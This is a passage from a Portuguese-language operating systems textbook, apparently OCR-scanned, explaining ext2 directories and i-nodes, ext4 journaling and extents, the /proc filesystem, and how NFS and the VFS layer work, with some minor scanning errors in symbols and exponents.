quatro vezes maiores. 

Seguindo o superbloco, aparecem os próprios i-no- 
dos. Eles são numerados de 1 até algum máximo. Cada 
i-nodo tem 128 bytes de comprimento e descreve exata- 
mente um arquivo. Um i-nodo contém informações de 
contabilidade (incluindo todas as informações retorna- 
das pelo stat, que simplesmente as tomam do i-nodo), 
assim como informações suficientes para localizar to- 
dos os blocos de disco que contêm os dados do arquivo. 

Seguindo os i-nodos aparecem os blocos de dados. 
Todos os arquivos e diretórios estão armazenados aqui. 
Se um arquivo ou diretório consiste em mais do que um 
bloco, os blocos não precisam ser contíguos no disco. 
Na realidade, os blocos de um arquivo grande têm mais 
chance de disseminar-se por todo o disco. 

I-nodos correspondendo aos diretórios são disper- 
sados através dos grupos de blocos do disco. Ext2 faz 
um esforço para colocar arquivos ordinários no mesmo 
grupo de blocos que o diretório pai, e os arquivos de da- 
dos no mesmo bloco que o i-nodo do arquivo original, 
desde que haja espaço suficiente. Essa ideia foi tomada 
emprestada do Berkeley Fast File System (MCKUSICK 
et al., 1984). Os mapas de bits são usados para tomar 
decisões rápidas sobre onde alocar novos dados do sis- 
tema de arquivos. Quando novos blocos de arquivos 
são alocados, ext2 também pré-aloca um número (oito) 
de blocos adicionais para aquele arquivo, de maneira a 
minimizar a fragmentação de arquivos devido a futuras 
operações de escrita. Esse esquema equilibra a carga do 
sistema de arquivos através do disco inteiro. Ele tam- 
bém tem um bom desempenho devido a suas tendências 
para colocação e fragmentação reduzida. 

Para acessar um arquivo, ele deve primeiro usar uma 
das chamadas de sistema do Linux, como open, que exi- 
ge o nome do caminho do arquivo. O nome do arquivo 
é analisado para extrair diretórios individuais. Se um ca- 
minho relativo for especificado, a busca começa a partir 
do diretório atual do processo, de outra maneira, começa 
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a partir do diretório raiz. De qualquer modo, o i-nodo 
para o primeiro diretório pode ser localizado facilmente: 
há um ponteiro para ele no descritor de processo, ou, no 
caso de um diretório raiz, ele é tipicamente armazenado 
em um bloco predeterminado no disco. 

O arquivo do diretório permite nomes de arquivos 
de até 255 caracteres e está ilustrado na Figura 10.32. 
Cada diretório consiste em algum número inteiro de 
blocos de disco de maneira que os diretórios podem ser 
escritos atomicamente para o disco. Dentro de um dire- 
tório, entradas para arquivos e diretórios estão fora de 
ordem, com cada entrada seguindo diretamente a que a 
antecedeu. Entradas não podem ocupar blocos de disco 
inteiros, então muitas vezes há uma série de bytes não 
utilizados na extremidade de cada bloco de disco. 

Cada entrada de diretório na Figura 10.32 consiste 
em quatro campos de comprimento fixo e um campo de 
comprimento variável. O primeiro campo é o número 
do i-nodo, 19 para o arquivo colossal, 42 para o arquivo 
voluminous e 88 para o diretório bigdir. Em seguida, 
vem um campo rec len, dizendo qual o tamanho da 
entrada (em bytes), possivelmente incluindo algum en- 
chimento após o nome. Esse campo é necessário para 
encontrar a próxima entrada para o caso de o nome do 
arquivo ter um enchimento (padding) de comprimen- 
to desconhecido. Este é o significado da seta na Figura 
10.32. Então vem o campo de tipos: arquivo, diretório e 
por aí afora. O último campo fixo é o comprimento do 
nome do arquivo real em bytes, 8, 10 e 6 nesse exemplo. 
Por fim, vem o próprio nome em si, terminado por um 
byte O e com enchimento até um limite de 32 bits. Um 
enchimento adicional pode seguir-se a isso. 

Na Figura 10.32(b) vemos o mesmo diretório após a 
entrada para voluminous ter sido removida. Tudo o que a 
remoção fez foi aumentar o tamanho do campo de entra- 
da total para colossal, transformando o primeiro campo 
para voluminous em enchimento para a primeira entrada. 
Esse enchimento pode ser usado para uma entrada subse- 
quente, é claro. 

Como os diretórios são pesquisados linearmente, 
pode levar um longo tempo para encontrar uma entrada 
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leal) (a) Um diretório no Linux com três arquivos. (b) O mesmo diretório após a exclusão do arquivo extenso. 
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ao fim de um grande diretório. Portanto, o sistema man- 
tém uma cache de diretórios recentemente acessados. 
Essa cache é pesquisada usando o nome do arquivo, e se 
um acerto ocorrer, a cara procura linear é evitada. Um 
objeto dentry é inserido na cache dentry para cada um 
dos componentes do caminho, e, através do seu i-nodo, 
o diretório é pesquisado para a entrada do elemento do 
caminho subsequente, até que o i-nodo do arquivo real 
seja alcançado. 

Por exemplo, para procurar um arquivo especifi- 
cado com um nome de caminho absoluto, como /usr/ 
ast/file, são necessários os passos a seguir. Primeiro, o 
sistema localiza o diretório raiz, que em geral usa o i- 
-nodo 2, especialmente quando o i-nodo 1 é reservado 
para o tratamento de blocos ruins. Então ele procura na 
cadeia “usr” no diretório raiz, para conseguir o número 
do i-nodo do diretório /usr, que também é inserido na 
cache dentry. Esse i-nodo é então buscado, e os blocos 
do disco são extraídos dele, de maneira que o diretório 
/usr pode ser lido e pesquisado para a cadeia “ast”. Uma 
vez que essa entrada tenha sido descoberta, o número 
do i-nodo para o diretório /usr/ast pode ser tomado dele. 
Armado com o número do i-nodo do diretório /usr/ast, 
esse i-nodo pode ser lido e os blocos do diretório lo- 
calizados. Por fim, “file” é procurado e seu número de 
i-nodo encontrado. Desse modo, o uso de um nome de 
caminho relativo não é apenas mais conveniente para o 
usuário, como também poupa uma quantidade substan- 
cial de trabalho para o sistema. 

Se o arquivo estiver presente, o sistema extrai o nú- 
mero do i-nodo e o utiliza como um índice para a ta- 
bela de i-nodo (no disco) a fim de localizar o i-nodo 
correspondente e trazê-lo para a memória. O i-nodo é 
colocado na tabela de i-nodo, uma estrutura de dados 
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de núcleo que contém todos os i-nodos para arquivos 
atualmente abertos e diretórios. O formato das entradas 
de i-nodo, no mínimo, realmente, deve conter todos os 
campos retornados pela chamada de sistema stat de ma- 
neira a fazer stat funcionar (ver Figura 10.28). Na Fi- 
gura 10.33 mostramos alguns dos campos incluídos na 
estrutura de i-nodo suportada pela camada do sistema 
de arquivos Linux. A estrutura de i-nodo real contém 
muitos campos mais, tendo em vista que a mesma estru- 
tura também é usada para representar diretórios, dispo- 
sitivos e outros arquivos especiais. A estrutura de i-nodo 
também contém campos reservados para o uso futuro. A 
história demonstrou que bits não utilizados não seguem 
assim por muito tempo. 

Vamos ver agora como o sistema lê um arquivo. 
Lembre-se de que uma chamada tipica para o procedi- 
mento de biblioteca a fim de invocar a chamada de sis- 
tema read se parece com: 


n = read(fd, buffer, nbytes); 


Quando o núcleo assume o controle, tudo o que 
ele tem para começar são esses três parâmetros e as 
informações nas suas tabelas internas relacionadas ao 
usuário. Um dos itens nas tabelas internas é o array de 
descritor de arquivos. Ele é indexado por um descritor 
de arquivos e contém uma entrada para cada arquivo 
aberto (até o número máximo, normalmente o padrão 
é 32). 

A ideia é começar com esse descritor de arquivos 
e terminar com o i-nodo correspondente. Vamos con- 
siderar um projeto possivel: simplesmente coloque um 
ponteiro para o i-nodo na tabela de descritores de ar- 
quivos. Embora simples, infelizmente esse método não 
funciona. O problema é o seguinte: associado com cada 
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(FIGURA 10.33] Alguns campos na estrutura de i-nodos do Linux. 












































Campo | Bytes Descrição 

Mode 2 Tipo do arquivo, bits de proteção, setuid, bits setgid 

Nlinks 2 Número de entradas no diretório apontando para esse i-nodo 

Uid 2 UID do proprietário do arquivo 

Gid 2 GID do proprietário do arquivo 

Size 4 Tamanho do arquivo em bytes 

Addr 60 Endereço dos primeiros 12 blocos do disco e de três blocos indiretos 
Gen 1 Número de geração (incrementado cada vez que o i-nodo é reutilizado) 
Atime 4 Horário do último acesso ao arquivo 

Mtime 4 Horário da última modificação do arquivo 

Ctime 4 Horário da última alteração do i-node (exceto as outras vezes) 





descritor do arquivo há uma posição de arquivo que diz 
em qual byte a próxima leitura (ou escrita) começará. 
Para onde ela deve ir? Uma possibilidade é colocá-la na 
tabela de i-nodo. No entanto, essa abordagem fracassa 
se acontecer de dois ou mais processos não relacionados 
abrirem o mesmo arquivo ao mesmo tempo porque cada 
um tem sua própria posição de arquivo. 

Uma segunda possibilidade é colocar a posição do 
arquivo na tabela de descritores de arquivos. Dessa ma- 
neira, cada processo que abre um arquivo recebe sua 
própria posição de arquivo privada. Infelizmente, esse 
esquema fracassa também, mas o raciocínio é mais su- 
til e tem a ver com a natureza do compartilhamento no 
Linux. Considere um script de shell, s, consistindo em 
dois comandos, p/ e p2, a serem executados em ordem. 
Se o script do shell for chamado pelo comando 


S >X 


espera-se que p/ vá escrever sua saída para x e então 
p2 vá escrever sua saída para x também, começando no 
lugar em que p/ parou. 

Quando o shell cria p/, x está inicialmente vazio, en- 
tão p1 apenas começa escrevendo um arquivo na posição 
de arquivo 0. No entanto, quando p/ termina, algum me- 
canismo é necessário para certificar-se de que a posição 
do arquivo inicial que p2 vê não é O (a qual seria se a 
posição do arquivo fosse mantida na tabela de descritores 
de arquivos), mas o valor com que p/ terminou. 

A maneira como isso é conseguido é mostrada na 
Figura 10.34. O truque é introduzir uma tabela nova, a 
tabela de descrição de arquivos abertos, entre a tabela 
de descritores do arquivo e a tabela de i-nodos, e colocar 
a posição do arquivo (e bit de leitura/escrita) ali. Nessa 


figura, o pai é o shell e o filho é primeiro p/ e depois 
p2. Quando o shell criar p/, a sua estrutura de usuário 
(incluindo a tabela de descritores de arquivos) é uma có- 
pia exata do shell, de maneira que ambos apontam para a 
mesma entrada da tabela de descritores de arquivos aber- 
ta. Quando p/ termina, o descritor de arquivo do shell 
ainda está apontando para o descritor do arquivo aberto 
contendo a posição de arquivo de p 7. Quando o shell ago- 
ra cria p2, o novo filho automaticamente herda a posição 
de arquivo, sem que ele ou o shell tenham de saber qual 
posição é essa. 

No entanto, se um processo não relacionado abre o 
arquivo, ele recebe sua própria entrada de descritor de 
arquivo aberto, com sua própria posição de arquivo, que 
é precisamente o que é necessário. Desse modo, todo 
sentido da tabela de descritores de arquivos abertos é 
permitir que um processo pai e um processo filho com- 
partilhem uma posição de arquivo, enquanto fornece a 
processos não relacionados seus próprios valores. 

Voltando ao problema de realizar uma read, mostra- 
mos agora como a posição do arquivo e o i-nodo estão 
localizados. O i-nodo contém os endereços de disco dos 
primeiros 12 blocos do arquivo. Se a posição do arquivo 
cair nos primeiros 12 blocos, o bloco é lido e os dados 
são copiados para o usuário. Para arquivos mais lon- 
gos do que 12 blocos, um campo no i-nodo contém o 
endereço de disco de um único bloco indireto, como 
mostrado na Figura 10.34. Esse bloco contém os ende- 
reços de disco de mais blocos de disco. Por exemplo, se 
um bloco tem 1 KB e um endereço de disco 4 bytes, o 
único bloco indireto pode conter 256 endereços de dis- 
co. Assim, esse esquema funciona para arquivos de até 
268 KB. 
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e TEWE A relação entre a tabela de descritores de arquivos, a tabela de descritores de arquivos abertos e a tabela de i-nodos. 
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Além disso, um bloco indireto duplo é usado. Ele 
contém endereços de 256 blocos indiretos únicos, cada 
um deles com os endereços de 256 blocos de dados. Esse 
mecanismo é suficiente para lidar com arquivos de até 10 
+ 2'° blocos (67.119.104 bytes). Se mesmo isso não for 
suficiente, o i-nodo tem espaço para um bloco indireto tri- 
plo. Seus ponteiros apontam para muitos blocos indiretos 
duplos. Esse esquema de endereçamento pode lidar com 
tamanhos de arquivos de 2™ blocos de 1 KB (16 GB). Para 
tamanhos de blocos de 8 KB, o esquema de endereçamen- 
to pode suportar tamanhos de arquivos de até 64 TB. 


O sistema de arquivos Ext4 do Linux 


A fim de evitar toda a perda de dados após quebras 
do sistema e quedas de energia, o sistema de arquivos 
ext2 teria de escrever cada bloco de dados para o disco 
tão logo ele fosse criado. A latência incorrida durante a 
operação de busca da cabeça do disco exigida seria tão 
alta que o desempenho seria intolerável. Portanto, escri- 
tas são atrasadas, e podem não ser cometidas (committed) 
mudanças para o disco por até 30 s, que é um intervalo 
de tempo muito longo no contexto de hardware de com- 
putadores modernos. 

Para melhorar a robustez do sistema de arquivos, o Li- 
nux conta com sistemas de arquivo com diário. Ext3, 
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um sucessor do sistema de arquivos ext2, é um exemplo 
de um sistema de arquivos com diário. Ext4, uma sequên- 
cia do ext3, também é um sistema de arquivo com diário, 
mas, diferentemente do ext3, ele muda o esquema de en- 
dereçamento de bloco usado por seus predecessores, des- 
se modo dando suporte tanto a arquivos maiores, quanto 
a tamanhos de sistema de arquivos globais maiores. Des- 
creveremos algumas dessas características a seguir. 

A ideia básica por trás de um sistema de arquivos 
é manter um diário, que descreve todas as operações 
do sistema de arquivos de maneira sequencial. Ao es- 
crever sequencialmente as mudanças para os dados do 
sistema de arquivos ou metadados (i-nodos, superbloco 
etc.), as operações não sofrem com as sobrecargas do 
movimento da cabeça de disco durante acessos de disco 
aleatórios. Eventualmente, as mudanças serão escritas, 
cometidas, para a localização de disco apropriada, e as 
entradas de diário correspondentes podem ser descar- 
tadas. Se ocorrer uma quebra do sistema ou queda de 
energia antes que as mudanças sejam cometidas, duran- 
te a reinicialização o sistema detectará que o sistema de 
arquivos não foi desmontado adequadamente, buscará 
no diário e aplicará as mudanças de sistema de arquivos 
descritas no registro do diário. 

O ext4 é projetado para ser altamente compatível 
com o ext2 e ext3, embora suas estruturas de dados do 
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núcleo e layout de disco sejam modificadas. Mesmo as- 
sim, um sistema de arquivos que foi desmontado como 
um sistema ext2 pode ser subsequentemente montado 
como um sistema ext4 e oferecer a capacidade de cria- 
ção de diário. 

O diário é um arquivo gerenciado como um buffer 
circular. Ele pode ser armazenado no mesmo disposi- 
tivo ou em um dispositivo separado do sistema de ar- 
quivos principal. Tendo em vista que as operações do 
diário não registram elas mesmas, elas não são tratadas 
pelo mesmo sistema de arquivos ext4. Em vez disso, 
um JBD (Journaling Block Device — Dispositivo de 
bloco de diário) é usado para realizar as operações de 
leitura/escrita do diário. 

O JBD dá suporte a três estruturas de dados princi- 
pais: registro de diário, tratamento de operação ató- 
mica e transação. Um registro de diário descreve uma 
operação de sistema de arquivos de baixo nível, tipi- 
camente resultando em mudanças dentro de um bloco. 
Tendo em vista que uma chamada de sistema como 
write inclui mudanças em múltiplos lugares — i-no- 
dos, blocos de arquivos existentes, blocos de arquivos 
novos, lista de blocos livres etc. — registros de diários 
relacionados são agrupados em operações atômicas. O 
ext4 notifica JBD do início e fim do processamento 
de chamadas do sistema, de maneira que JBD possa 
assegurar que todos os registros de diário em uma ope- 
ração atômica sejam aplicados, ou nenhum deles. Por 
fim, fundamentalmente por razões de eficiência, JBD 
trata as coleções de operações atômicas como transa- 
ções. Registros de diário são armazenados de modo 
consecutivo dentro de uma transação. JBD permitirá 
que porções do arquivo de diário sejam descartadas 
apenas depois que todos os registros de diário perten- 
centes a uma transação forem comprometidos segura- 
mente ao disco. 

Dado que escrever uma entrada de diário para cada 
mudança de disco pode ser caro, ext4 pode ser confi- 
gurado para manter um diário de todas as mudanças de 
disco, ou apenas de mudanças relacionadas aos meta- 
dados do sistema de arquivos (os i-nodos, superblocos 
etc.). A criação de um diário somente de metadados cria 
menos sobrecarga e resulta em um desempenho me- 
lhor, mas não dá garantia alguma contra a corrupção de 
dados de arquivos. Vários outros sistemas de arquivos 
mantêm diários de apenas operações de metadados (por 
exemplo, XFS do SGT). Além disso, a confiabilidade do 
diário pode ser melhorada mais ainda realizando somas 
de conferência (checksumming). 

A modificação fundamental no ext4 em compa- 
ração com seus predecessores é o uso de extensões. 


Extensões representam blocos contíguos de armazena- 
mento, por exemplo, 128 MB de blocos de 4 KB con- 
tíguos versus blocos de armazenamento individuais, 
como referenciado no ext2. Diferentemente dos seus 
predecessores, ext4 não exige operações de metada- 
dos para cada bloco de armazenamento. Esse esquema 
também reduz a fragmentação para arquivos grandes. 
Como consequência, ext4 pode proporcionar opera- 
ções de sistemas de arquivos mais rápidas e suportar 
arquivos e tamanhos de sistemas de arquivos maiores. 
Por exemplo, para um tamanho de bloco de 1 KB, ext4 
aumenta o tamanho do arquivo máximo de 16 GB para 
16 TB, e o tamanho do sistema de arquivo máximo 
para 1 EB (Exabyte). 


O sistema de arquivos /proc 


Outro sistema de arquivos Linux é o /proc (de pro- 
cessos), uma ideia originalmente projetada pela 8: edi- 
ção do UNIX do Bell Labs e mais tarde copiado em 
4.4BSD e System V. No entanto, o Linux estendeu a 
ideia de diversas maneiras. O conceito básico é que 
para cada processo no sistema, é criado um diretório em 
/proc. O nome do diretório é o PID do processo expres- 
so como um número decimal. Por exemplo, /proc/619 
é o diretório correspondente ao processo com PID 619. 
Nesse diretório há arquivos que aparecem para conter 
informações sobre o processo, como sua linha de co- 
mando, cadeias de ambiente e máscaras de sinais. Na 
realidade, esses arquivos não existem no disco. Quan- 
do eles são lidos, o sistema recupera as informações do 
processo real conforme a necessidade e as retorna em 
formato padrão. 

Muitas das extensões do Linux relacionam-se a ou- 
tros arquivos e diretórios localizados em /proc. Eles 
contêm uma ampla gama de informações sobre a CPU, 
partições de disco, dispositivos, vetores de interrupção, 
contadores de núcleo, sistemas de arquivos, módulos 
carregados, e muito mais. Programas de usuário não 
privilegiados podem ler grande parte dessa informação 
para aprender sobre o comportamento do sistema de 
uma maneira segura. Alguns desses arquivos podem ser 
escritos a fim de mudar parâmetros de sistemas. 


10.6.4 NFS: o sistema de arquivos de rede 


A rede teve um papel importante no Linux e no UNIX 
em geral, desde o início (a primeira rede UNIX foi cons- 
truída para mover novos núcleos do PDP-11/70 para o In- 
terdata 8/32 durante a adaptação para o segundo). Nesta 


seção examinaremos o NFS (Network File System — 
Sistema de Arquivos em Rede), que é usado em todos os 
sistemas Linux modernos para juntar os sistemas de ar- 
quivos em computadores separados em um todo lógico. 
Atualmente, a implementação NSF dominante é a versão 
3, introduzida em 1994. NSFv4 foi introduzido em 2000 e 
fornece diversos incrementos sobre a arquitetura NFS an- 
terior. Três aspectos do NFS são interessantes: a arquite- 
tura, o protocolo e a implementação. Examinaremos cada 
um deles, primeiro no contexto da versão 3 do NFS mais 
simples, então passaremos às melhorias incluídas na v4. 


Arquitetura NFS 


A ideia básica por trás do NFS é permitir que uma co- 
leção arbitrária de clientes e servidores compartilhe de um 
sistema de arquivos comum. Em muitos casos, todos os 
clientes e servidores estão na mesma LAN, mas isso não 
é exigido. Também é possível executar o NFS através de 
uma rede de longa distância se o servidor estiver distante 
do cliente. Para simplificar a questão, falaremos de clien- 
tes e servidores como se eles fossem máquinas distintas, 
mas na realidade, o NFS permite que cada máquina seja 
tanto um cliente quanto um servidor ao mesmo tempo. 

Cada servidor NFS exporta um ou mais dos seus 
diretórios para serem acessados por clientes remotos. 
Quando um diretório é disponibilizado, da mesma ma- 
neira o são todos os seus subdiretórios, então na rea- 
lidade árvores de diretório inteiras são normalmente 
exportadas como uma unidade. A lista de diretórios que 
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um servidor exporta é mantida em um arquivo, muitas 
vezes /etc/exports, de maneira que esses diretórios po- 
dem ser exportados automaticamente sempre que o ser- 
vidor é inicializado. Os clientes acessam os diretórios 
exportados montando-os. Quando um cliente monta um 
diretório (remoto), ele torna-se parte dessa hierarquia de 
diretórios, como mostra a Figura 10.35. 

Nesse exemplo, o cliente 1 montou o diretório bin do 
servidor 1 no seu próprio diretório bin, de maneira que 
ele pode agora referir-se ao shell como /bin/sh e obter o 
shell no servidor 1. Estações de trabalho sem disco mui- 
tas vezes têm apenas um sistema de arquivos esqueleto 
(em RAM) e recebem todos os seus arquivos de servi- 
dores remotos como esse. De modo similar, o cliente 1 
montou o diretório do servidor 2 /projects no seu diretó- 
rio /usr/ast/work de maneira que ele pode agora acessar o 
arquivo a como /usr/ast/work/projl/a. Por fim, o cliente 
2 também montou o diretório projects e também pode 
acessar o arquivo a, apenas como /mnt/proj1/a. Como vi- 
mos aqui, o mesmo arquivo pode ter nomes diferentes em 
clientes diferentes devido a ele ser montado em um lugar 
diferente nas suas árvores respectivas. O ponto de monta- 
gem é inteiramente local aos clientes; o servidor não sabe 
onde ele é montado em qualquer um dos seus clientes. 


Protocolos NFS 


Tendo em vista que uma das metas do NFS é dar su- 
porte a um sistema heterogêneo, com clientes e servi- 
dores possivelmente executando sistemas operacionais 


(FIGURA 10.35] Exemplos de sistemas de arquivos remotos montados localmente. Os diretórios são representados por quadrados, e os 


arquivos, por círculos. 
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diferentes em diferentes hardwares, é essencial que a in- 
terface entre os clientes e os servidores seja bem definida. 
Apenas então alguém será capaz de escrever uma nova 
implementação de cliente e esperar que ela funcione cor- 
retamente com os servidores existentes, e vice-versa. 

O NFS consegue essa meta definindo dois protoco- 
los cliente-servidor. Um protocolo é um conjunto de 
solicitações enviadas por clientes para servidores, junto 
com as respostas correspondentes enviadas pelos servi- 
dores de volta aos clientes. 

O primeiro protocolo NFS lida com a montagem. Um 
cliente pode enviar um nome de caminho para um ser- 
vidor e solicitar permissão para montar aquele diretório 
em alguma parte na sua hierarquia de diretório. O lugar 
onde ele é montado não é contido na mensagem, à medi- 
da que o servidor não se importa com o local em que ele 
será montado. Se o nome do caminho é legal e o diretório 
especificado tiver sido exportado, o servidor retorna um 
manipulador de arquivo ao cliente. O manipulador de 
arquivo contém campos unicamente identificando o tipo 
do sistema de arquivos, o disco, o número do i-nodo do 
diretório e informações de segurança. Chamadas sub- 
sequentes aos arquivos de leitura e escrita no diretório 
montado ou qualquer um dos seus subdiretórios usam o 
manipulador do arquivo. 

Quando o Linux inicializa, ele executa o script do 
shell /etc/rc antes de tornar-se multiusuário. Coman- 
dos para montar sistemas de arquivos remotos podem 
ser colocados nesse script, assim montando automati- 
camente os sistemas de arquivos remotos necessários 
antes de permitir quaisquer logins. Como alternativa, 
a maioria das versões do Linux também suporta a au- 
tomontagem. Essa característica permite que um con- 
junto de diretórios remotos seja associado ao diretório 
local. Nenhum desses diretórios remotos é montado (ou 
seus servidores mesmo contatados) quando o cliente é 
inicializado. Em vez disso, no primeiro momento em 
que um arquivo remoto é aberto, o sistema operacional 
envia uma mensagem para cada um dos servidores. O 
primeiro a responder vence, e seu diretório é montado. 

A automontagem tem duas vantagens principais so- 
bre a montagem estática por meio de um arquivo /etc/rc. 
Primeiro, se acontece de um dos servidores NFS cha- 
mado /etc/rc estar caído, é impossível trazer o cliente 
à tona, pelo menos não sem alguma dificuldade, atraso 
e um bom número de mensagens de erros. Se o usuário 
não chega nem a precisar daquele servidor no momento, 
todo o trabalho é desperdiçado. Segundo, ao permitir 
que o cliente tente um conjunto de servidores em para- 
lelo, um grau de tolerância a falhas pode ser alcançado 
(porque somente um deles precisa estar funcionando), 


e o desempenho pode ser melhorado (escolhendo o 
primeiro para responder — presumivelmente o menos 
carregado). 

Por outro lado, é tacitamente presumido que todos 
os sistemas de arquivos especificados como alternati- 
vas para a automontagem são idênticos. Como NFS não 
fornece apoio para uma cópia do diretório ou arquivo, 
cabe ao usuário arranjar para que todos os sistemas de 
arquivos sejam os mesmos. Em consequência, a auto- 
montagem é mais comumente usada para sistema de ar- 
quivos somente de leitura contendo binários do sistema 
e outros arquivos que raramente mudam. 

O segundo protocolo NFS é para o acesso de diretó- 
rio e arquivos. Clientes podem enviar mensagens para 
os servidores manipularem diretórios e ler e escrever 
arquivos. Eles podem também acessar atributos dos ar- 
quivos, como modo do arquivo, tamanho e horário da 
última modificação. A maioria das chamadas do sistema 
Linux tem o suporte do NFS, com talvez as surpreen- 
dentes exceções do open e close. 

A omissão do open e close não é um acidente. Ela 
é absolutamente intencional. Não é necessário abrir um 
arquivo antes de lê-lo, tampouco fecha-lo quando estiver 
terminado. Em vez disso, para ler um arquivo, um clien- 
te envia ao servidor uma mensagem lookup contendo o 
nome do arquivo, com uma solicitação para examiná- 
-lo e retornar um manipulador dele, que é uma estrutura 
que identifica o arquivo (isto é, contém um identificador 
de sistema do arquivo e número de i-nodo, entre outros 
dados). Diferentemente de uma chamada open, essa 
operação lookup não copia informação alguma para as 
tabelas do sistema interno. A chamada read contém o 
manipulador do arquivo para ler, o deslocamento (off- 
set) do arquivo de onde começar a leitura e o número de 
bytes desejados. Cada mensagem dessas é autocontida. 
A vantagem desse esquema é que o servidor não preci- 
sa lembrar de nada a respeito das conexões abertas entre 
chamadas para ele. Desse modo, se um servidor quebra 
e então se recupera, nenhuma informação a respeito dos 
arquivos abertos é perdida, porque não há nenhuma. Esse 
tipo de servidor que não mantém informações de estado 
sobre arquivos abertos é conhecido como sem estado. 

Infelizmente, o método NFS torna dificil atingir a exata 
semântica de arquivos Linux. Por exemplo, no Linux um 
arquivo pode ser aberto e bloqueado de maneira que outros 
processos não possam acessá-lo. Quando o arquivo é fe- 
chado, as travas são liberadas. Em um servidor sem estado 
como o NFS, as travas não podem ser associadas a arqui- 
vos abertos, pois o servidor não sabe quais arquivos estão 
abertos. Portanto, o NFS precisa de um mecanismo sepa- 
rado, adicional, para lidar com o travamento de arquivos. 


O NFS usa o mecanismo de proteção UNIX padrão, 
com os bits rwx para o proprietário, grupo e outros (men- 
cionado no Capítulo 1 e discutido em detalhes a seguir). 
Originalmente, cada mensagem de solicitação apenas 
continha os IDs do usuário e do grupo do chamador, que 
o servidor NFS usava para validar o acesso. Na realidade, 
ele confiava em que os clientes não trapaceariam. Vá- 
rios anos de experiência demonstraram fartamente que 
tal presunção era — como eu poderia dizer? — um tanto 
ingênua. Hoje, a criptografia de chaves públicas pode ser 
usada para estabelecer uma chave segura para validar o 
cliente e o servidor em cada solicitação e resposta. Quan- 
do essa opção é usada, um cliente malicioso não pode 
passar-se por outro, pois desconhece sua chave secreta. 


Implementação do NFS 


Embora a implementação do código cliente e ser- 
vidor seja independente dos protocolos NFS, a maio- 
ria dos sistemas Linux usa uma implementação de três 
camadas similar aquela da Figura 10.36. A camada de 
cima é uma camada de chamada de sistema. Ela lida 
com chamadas como open, read e close. Após analisar 
a chamada e conferir os parâmetros, ela invoca a segun- 
da camada, a camada VFS. 

A tarefa da camada VFS é manter uma tabela com 
uma entrada para cada arquivo aberto. A camada VFS 
adicionalmente tem uma entrada, um i-nodo virtual ou 
v-nodo, para cada arquivo aberto. V-nodos são usados 
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para dizer se o arquivo é local ou remoto. Para arquivos 
remotos, são fornecidas informações suficientes a eles 
para serem capazes de acessá-los. Para arquivos locais, 
o sistema de arquivos e i-nodo são gravados, pois os sis- 
temas modernos Linux podem suportar múltiplos siste- 
mas de arquivos (por exemplo, ext2fs, /proc, FAT etc.). 
Embora o VFS tenha sido inventado para dar suporte ao 
NFS, a maioria dos sistemas Linux modernos agora dá 
suporte a ele como uma parte integral do sistema opera- 
cional, mesmo que o NFS não seja usado. 

Para ver como os v-nodos são usados, vamos traçar 
uma sequência de chamadas de sistema mount, open e 
read. Para montar um sistema de arquivos remoto, o ad- 
ministrador do sistema (ou /etc/rc) chama o programa 
mount especificando o diretório remoto, o diretório local 
no qual ele será montado e outras informações. O pro- 
grama mount analisa o nome do diretório remoto a ser 
montado e descobre o nome do servidor NFS no qual o 
diretório remoto está localizado. Ele então contata aquela 
máquina, pedindo um manipulador de arquivo para o di- 
retório remoto. Se o diretório existe e está disponível para 
a montagem remota, o servidor retorna um manipulador 
de arquivo para o diretório. Por fim, faz uma chamada de 
sistema mount, passando o manipulador para o núcleo. 

O núcleo então constrói um v-nodo para o diretório re- 
moto e pede o código cliente NFS na Figura 10.36 para 
criar um r-nodo (i-nodo remoto) nas suas tabelas internas 
a fim de conter o manipulador do arquivo. O v-nodo apon- 
ta para o r-nodo. Cada v-nodo na camada VFS em últi- 
ma análise conterá um ponteiro para um r-nodo no código 
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cliente NFS, ou um ponteiro para um i-nodo em um dos 
sistemas de arquivos locais (mostrados como linhas trace- 
jadas na Figura 10.36). Desse modo, a partir do v-nodo, é 
possível ver se um arquivo ou diretório é local ou remoto. 
Se ele for local, o sistema de arquivos correto e i-nodo po- 
dem ser localizados. Se ele for remoto, o hospedeiro remo- 
to e o manipulador de arquivo podem ser localizados. 

Quando um arquivo remoto é aberto no cliente, em 
algum momento durante a análise do nome do caminho, 
o núcleo atinge o diretório sobre o qual o sistema de ar- 
quivos remoto está montado. Ele vê que esse diretório 
é remoto e, no v-nodo do diretório, encontra o pontei- 
ro para o r-nodo. Ele então pergunta o código de cliente 
NFS para abrir o arquivo. O código de cliente NFS exa- 
mina a porção restante do nome do caminho no servidor 
remoto associado com o diretório montado e retorna com 
um manipulador de arquivo para ele. Ele faz um r-nodo 
para o arquivo remoto nas suas tabelas e reporta de volta 
à camada VFS, que coloca em suas tabelas um v-nodo 
para o arquivo que aponta para o r-nodo. De novo, aqui 
vemos que todos os arquivos ou diretórios abertos têm 
um v-nodo que aponta para um r-nodo ou um i-nodo. 

Ao chamador é dado um descritor de arquivos para o 
arquivo remoto. Esse descritor de arquivos é mapeado no 
v-nodo por tabelas na camada VFS. Observe que nenhu- 
ma entrada de tabela é feita do lado do servidor. Embora 
o servidor esteja preparado para prover manipuladores de 
arquivos mediante solicitação, ele não controla quais ar- 
quivos vêm a ter manipuladores de arquivos emitidos e 
quais não os têm. Quando um manipulador de arquivo é 
enviado para acessar um arquivo, ele confere o manipula- 
dor, e se ele for válido, o utiliza. A validação pode incluir 
a verificação da chave de autenticação nos cabeçalhos 
RPC, se a segurança estiver habilitada. 

Quando um descritor de arquivo é usado em uma 
chamada de sistema subsequente, por exemplo, read, a 
camada VFS localiza o v-nodo correspondente, e a par- 
tir daí determina se ele é local ou remoto e também qual 
i-nodo ou r-nodo o descreve. Ele então envia uma men- 
sagem para o servidor contendo o manipulador, o deslo- 
camento do arquivo (que é mantido no lado do cliente, 
não no lado do servidor) e a contagem de bytes. Por 
questões de eficiência, as transferências entre cliente e 
servidor são feitas em grandes blocos, normalmente de 
8.192 bytes, mesmo que menos bytes sejam solicitados. 

Quando a mensagem de solicitação chega ao servidor, 
ela é passada para a camada VFS ali, que determina qual 
sistema de arquivos local contém o arquivo solicitado. A 
camada VFS então faz uma chamada para aquele sistema 
de arquivos local para ler e retornar os bytes. Esses dados 
são então passados de volta para o cliente. Após a camada 


de VFS do cliente ter recebido o bloco de 8 KB que pediu, 
ela automaticamente emite uma solicitação para o próxi- 
mo bloco, de maneira que ele o tenha se precisar dele em 
seguida. Essa característica, conhecida como leitura an- 
tecipada, melhora o desempenho de modo considerável. 

Para escritas, um caminho análogo é seguido do clien- 
te para o servidor. Também, são feitas transferências em 
